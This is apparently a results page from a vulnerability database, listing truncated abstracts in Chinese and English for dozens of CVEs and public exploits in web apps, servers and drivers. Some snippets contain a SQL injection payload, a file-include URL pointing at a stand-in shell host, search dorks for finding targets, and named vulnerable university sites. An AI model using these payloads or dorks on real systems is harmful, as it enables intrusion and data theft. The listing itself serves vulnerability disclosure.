56796 matches found
XStream远程代码执行漏洞(CVE-2021-29505)
CVE-2021-29505 Vulnerability CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack. Affected Versions All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's...
Broadcom: Heap overflow in "wl_run_escan" when handling WLC_GET_VALID_CHANNELS ioctl results(CVE-2017-0568)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is use...
phpshe v1.1 任意文件上传漏洞
No description provided by source...
PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl inphex PHPizabi v0.848b C1 HFP1 Remote Code Execution http://www.dz-secure.com/tools/1/WebESploit.pl.txt if you are seeking for a partner to work on some projects just send an email inphex0 at gmail dot com system/vcronproc.php if...
XOOPS Module Repository ViewCat.PHP SQL注入漏洞
XOOPS Module Repository是一款基于PHP的WEB应用程序。 XOOPS Module Repository不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息。 问题是'ViewCat.PHP'脚本对用户提交的'cid'参数缺少过滤,提交恶意SQL代码作为参数数据,可导致更改原来的SQL逻辑,获得敏感信息。 Xoops Module Repository 目前没有解决方案提供: http://www.xoops.org/modules/repository/ http://www.sebug.net/show-exp-1622.html...
Bingo News BP_ncom.PHP远程文件包含漏洞
BinGoPHP是一款基于PHP的WEB应用程序。 BinGoPHP不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'BPncom.PHP'脚本对用户提交的'bnrep'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 BinGoPHP BinGoPHP 3.01 http://bingophp.free.fr/ http://www.example.com/Script Path/bpncom.php?bnrep=http://SHELLURL.COM?...
Linux ext4: out-of-bounds memcpy via non-inline system.data xattr(CVE-2018-11412)
ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the iblock field in the inode which normally contains a list of blocks instead,...
Apache Tomcat information disclosure Vulnerability, CVE-2016-6816)
Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.0.M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0.RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47 Earlier, unsupported versions may also be affected...
ecshop商城系统 delete_cart_goods.php文件SQL注入漏洞
0x01 框架介绍 商城网站建设-damall多功能商城建站系统,支持B2C2C,O2O模式...DaMall商城建站系统采用强劲的.NET企业级平台研发,可兼容多行业、多模式的业务特点以及扩展需求。 官方主页:http://www.bg68.com 0x02 漏洞细节 漏洞页面: http://mall.bg68.com/httphandler/getdata.ashx 参数brandid 部分用户案例: http://mall.hicay.com/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ash...
Espcms v5.0 /index.php SQL注入漏洞
构造www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema.tables where tableschema=database limit 0,1,floorrand02x from informationschema.tables group by xa%23...
CUPS Filter Bash Environment Variable Code Injection
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initializeinf...
AlstraSoft AskMe Pro <= 2.1 - Multiple SQL Injection Vulnerabilities
No description provided by source. -+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By: t0pP8uZz...
coremail任意文件读取漏洞
简要描述: coremail在实现上存在缺陷,利用80sec发布的xml解析漏洞可以读取服务器上任意文件,包括服务器配置文件和敏感的数据库文件,结合上下文逻辑可能可以获得更高权限,影响所有使用coremail的用户 详细说明: coremail服务在接受和传递参数时使用的是xml的格式进行数据传递,但是根据80sec的安全公告,如果服务端在处理xml数据时格式不对就会导致安全漏洞,使用应用上下文的权限来获取任意文件内容,结合逻辑可能可以得到更多的权限 漏洞证明: 神奇的代码哦,就是简单的在xml头部附加我们的恶意就可以了 POST...
Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability
No description provided by source. Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca a...
Tomcat information disclosure Vulnerability(CVE-2017-12616 )analysis
Several recent Tomcat CVE CVE-2017-5664 Tomcat Security Constraint Bypass CVE-2017-12615 remote code execution vulnerability CVE-2017-12616 information disclosure vulnerability Common Is tasteless With JspServlet and DefaultServlet about the system. CVE-2017-12615 this remote code execution are...
PHPCMS v9 wap module SQL injection
Suspicious of the function 1. localhost/phpcms/modules/attachment/attachments. php file of the first 241GET submitted to the src variable to bring the saferelace function, and now we're into this damn filter function to see what it's doing 2. The filter function profile and bypass...
NS-ASG 应用安全网关 resetpwd.php等10处 SQL注入漏洞
No description provided by source...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
No description provided by source. Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is that the tool simply scans t...
Joomla Component com_facileforms 1.4.4 RFI Vulnerability
No description provided by source. Title: Joomla Component ComFacileforms ================================================================ + Author : Dr.Kacak + Special Thankz : KnocKout and all my friends + System 0VerfL0verZ ================================================================= Scri...
pigcms id参数SQL注入漏洞
No description provided by source...
WebSphere “Java 反序列化”过程远程命令执行漏洞
满足此漏洞的环境配置 漏洞源头commons-collections.jar 开启的SOAP端口8880. /opt/IBM/WebSphere/AppServer/properties/wsadmin.properties 测试websphere的环境版本号7.0.0.11,目前最新的版本是8.5.5 漏洞影响 ZoomEye 团队针对全球开放8880端口的289.6万服务器进行了漏洞验证,已经确认其中963台服务器存在该风险 关联漏洞链接 1. JBoss “Java 反序列化”过程远程命令执行漏洞 https://www.sebug.net/vuldb/ssvid-89723 2...
Discuz x3.2前台GET型SQL注入漏洞(绕过全局WAF)
/source/include/misc/miscstat.php 46行: if!empty$GET'xml' $xaxis = ''; $graph = array; $count = 1; $begin = dgmdate$beginunixstr, 'Ymd'; $end = dgmdate$endunixstr, 'Ymd'; $field = ''; if!empty$GET'merge' ifempty$GET'types' $GET'types' = arraymerge$cols'login', $cols'forum', $cols'tgroup',...
Python socket.recvfrom_into() - Remote Buffer Overflow
No description provided by source. !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912...
正方教务管理系统存在XSS漏洞可威胁所有登陆用户
简要描述: 所有登陆正方教务系统的用户都可能受到该漏洞威胁。 详细说明: 登陆正方教务系统后,每个用户的首页为用户公告栏。 教师具有修改/添加公告栏的内公告的权限,而此处存在XSS漏洞。 漏洞证明: 使用任意一位教师账号登陆(教师账号怎么获得?自己想办法吧,不过目测不少老师都用着默认密码没有修改): 点击公用信息,教务公告: 这里,公告标题可以随意发挥,我们来段弹窗试试: 这样就成功地增加了一条公告,默认是全校所有用户可见。同时还可以选择该条消息面向的对象(某个学院所有用户或者某位老师),从而实现XSS炸弹的定点爆破: 换个用户登录系统,就可以看到如下提示:...
Organic Technologies CMS productos.php parameter id SQL injection vulnerability
No description provided by source...
大米CMSFV5.53遍历目录
No description provided by source...
用友致远A6协同系统 /yyoa/HJ/iSignatureHtmlServer.jsp 文件 SQL注入漏洞
No description provided by source...
Siteserver 内容管理系统 /livefiles/pages/inner/userlist.aspx SQL 注入
No description provided by source...
libreport信息泄露漏洞
No description provided by source...
Ingo Procmail驱动Shell命令执行漏洞
Ingo是一款邮件过滤规则管理器,集成于Horde和IMP Webmail客户端。 Ingo的procmail驱动没有正确地转义文件夹名称,远程攻击者可能利用此漏洞执行任意Shell命令。 Horde Ingo 1.1.1 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: ftp://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz http://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz...
PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability
No description provided by source. ==================================================================== PhotoPost = 4.6 PPPATH Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz http://www.popphoto.com/...
泛微oa /webservice/upload.php /webservice/upload/upload.php 等多处任意文件上传
任意文件上传共四处,属于同一个漏洞 文件位置 /webservice/upload.php /webservice/upload/upload.php /webservice-json/upload/upload.php /webservice-xml/upload/upload.php 四处都有如下代码 没有对文件有任何验证,无须登陆 文件上传之后的位置是: $path = $ATTACHPATH.$attachmentID; $fileName = $path."/".$FILES'file''name'; moveuploadedfile $FILES'file''tmpname'...
IIS 系列 Http.sys 处理 Range 整数溢出漏洞
一、漏洞概要 2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。 漏洞描述Http.sys 是一个位于 Windows 操作系统核心组件,能够让任何应用程序通过它提供的接口,以 Http 协议进行信息通讯。微软在 Windows 2003 Server 里引进了新的 HTTP API 和内核模式驱动 Http.sys,目的是使基于 Http 服务的程序更有效率。其实在 Windows XP 安装 SP2 后,Http.sys...
PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/33525/info PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that a...
JBoss, JMX Console, misconfigured DeploymentScanner
No description provided by source. !/usr/bin/perl Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner Date: Oct 3 2011 Author: y0ug at codsec.com Version: Tested on: Linux CVE : CVE-2010-0738 POC against misconfigured JBoss JMX Console It use the addUrl method in DeploymentScanner...
Joomla Template BizWeb com_community Persistent XSS Vulnerability
No description provided by source. 1 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Joomla comcommunity Persistent Xss Vulnerability Date : june, 21 2010 Critical Level : HIGH Vendor Url : http://styleware.eu/...
Microsoft IIS交换数据流绕过认证漏洞(MS10-065)
BUGTRAQ ID: 41314 CVE ID: CVE-2010-2731 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS没有正确地处理目录的基础认证,远程攻击者可以在请求的目录名后附加NTFS流名称和流类型(:$i30:$INDEXALLOCATION)绕过认证访问受保护的目录。 Microsoft IIS 5.1 厂商补丁: Microsoft --------- Microsoft已经为此发布了一个安全公告(MS10-065)以及相应补丁:...
resin 3.1.1 跨站脚本漏洞
No description provided by source...
NewsReactor 20070220 Article Grabbing Remote BoF Exploit (1)
No description provided by source. / NewsReactor 20070220 Article Grabbing Remote Buffer Overflow Exploit 1 &nbs...
方正论文授权提交系统后台管理员登陆SQL注入漏洞/防范绕过/拖库/挂马隐患
简要描述: 在母校网站上偶尔发现论文提交系统存在明显漏洞,度娘一下发现这个系统普及率较广,影响大学很多,所有学位论文可以任意下载,学生几年的辛苦可能被人轻松搞去,去年10月份已经有人在乌云提过,但是仍然有很多学校没有防范过滤,已经添加过滤的也可以轻松绕过,一旦绕过,由于文件上传漏洞可以直接挂马 详细说明: 已经验证过的影响学校如下: 云南大学(未作防护)http://202.203.222.222/tasi/admin.asp?lang=gb 华南师范大学增城学院(未作防护)http://lib2.scnuzc.cn/tasi/admin/login.asp...
phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie = 3.0.2 BEAUTPATH Remote File Include Vulnerability + + + - Script name: phpCodeGenie v. 3.0.2 - Script site: http://sourceforge.net/projects/phpcodegenie/ + + + - Find by: Kacper a.k.a Rahim +...
Apache Tomcat 拒绝服务漏洞(CVE-2012-5568)
Bugtraq ID:56686 CVE ID:CVE-2012-5568 Apache Tomcat是一款开放源码的JSP应用服务器程序。 Apache Tomcat存在一个安全漏洞,攻击者缓慢的连续发送头字段接着头字段请求,可导致服务器消耗系统资源,如线程资源,造成拒绝服务攻击。 Slowloris拒绝服务攻击工具可触发此漏洞。 0 Apache Software Foundation Tomcat 7.0.x Apache Software Foundation Tomcat 6.0.x Apache Software Foundation Tomcat 5.x Apache...
Tinyproxy 'conf.c'整数溢出安全绕过漏洞
Bugtraq ID: 47715 CVE ID:CVE-2011-1499 Tinyproxy是一个小型的基于GPL的HTTP/SSL代理程序。 Tinyproxy在子网掩码生成实现上存在一个错误,当配置允许网络段时如"Allow 192.168.0.0/24"相对与默认的"Allow 127.0.0.1",会允许任意IP地址连接,使其成为一个开放代理。如果配置使用一个或多个使用IP段的Allow语句,就会发生这种情况。 Banu Systems Private Limited Tinyproxy 1.8.2 厂商解决方案 Tinyproxy 1.8.3已经修复此漏洞,建议用户下载使用...
MySQL COM_FIELD_LIST命令绕过权限检查漏洞
BUGTRAQ ID: 40109 CVE ID: CVE-2010-1848 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 MySQL在处理COMFIELDLIST命令的表格名称参数时没有正确的执行权限检查,对一个表格拥有DELETE或SELECT权限的认证用户可以读取或删除其他表格的内容。 MySQL 5.1/5.0 厂商补丁: Oracle ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://bugs.mysql.com/bug.php?id=53371...
eWebEditorNet upload.aspx 上传漏洞
WebEditorNet 主要是一个upload.aspx文件存在上传漏洞。 form id="post" encType="server" "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript" 只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click;满足条件达到上传木马的效果。成功以后查看源代码 a "lbtnUpload" "javascript:doPostBack'lbtnUpload',''"/script 'javascript'...
MS14-058 Windows内核提权漏洞 (CVE-2014-4113)
No description provided by source...
CmsTop媒体版中某处sql注入漏洞
简要描述: sql注入漏洞 详细说明: 可以直接修改 管理员密码。 问题出现在 uc.php接口中,没有正确的判断UC接口是否开启,而key又是默认的。 因为代码中自己关闭了GPC,所以会导致注入。 $set= setting'member'; $set'ucdbtablepre' = ''.$set'ucdbname'.'.'.$set'ucdbtablepre'; $set = arraychangekeycase$set, CASEUPPER; foreach$set as $k = $v ifpregmatch'/^UC/',$k define$k,$v;...
BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability
No description provided by source. BookmarkX scriptPowered by GengoliaWebStudioSQL Injection AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "2007 BookmarkX script" DORKS 2 : Powered by GengoliaWebStudio DORK 3 : allinurl :"index.php?menu=showtopic" EXPLOIT :...
CherryPy Cookie会话Id信息泄露漏洞
BUGTRAQ ID: 27181 CherryPy是Python编写的面向对象的HTTP框架。 CherryPy在处理Cookie数据时存在漏洞,远程攻击者可能利用此漏洞访问系统上的任意文件。 如果用户通过cookie提供了恶意的会话ID的话,且服务器在使用基于文件的会话,应用程序就可能引用会话目录之外的文件(文件名以SESSIONPREFIX开始)。 cherrypy.org CherryPy 3.0.2 cherrypy.org CherryPy 2.1.1 cherrypy.org ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Aurora IDEX Membership(IDXM), ERC20 Token, allows attackers to acquire contract ownership (CVE-2018–10666)
Abstract I found a new vulnerability in smart contract of IDXM Token CVE-2018–106661. Attackers can acquire contract ownership because the setOwner function is delcared as public. A new owner can subsequently bypass intended access restrictions by, for example, calling uploadBalances. Details In...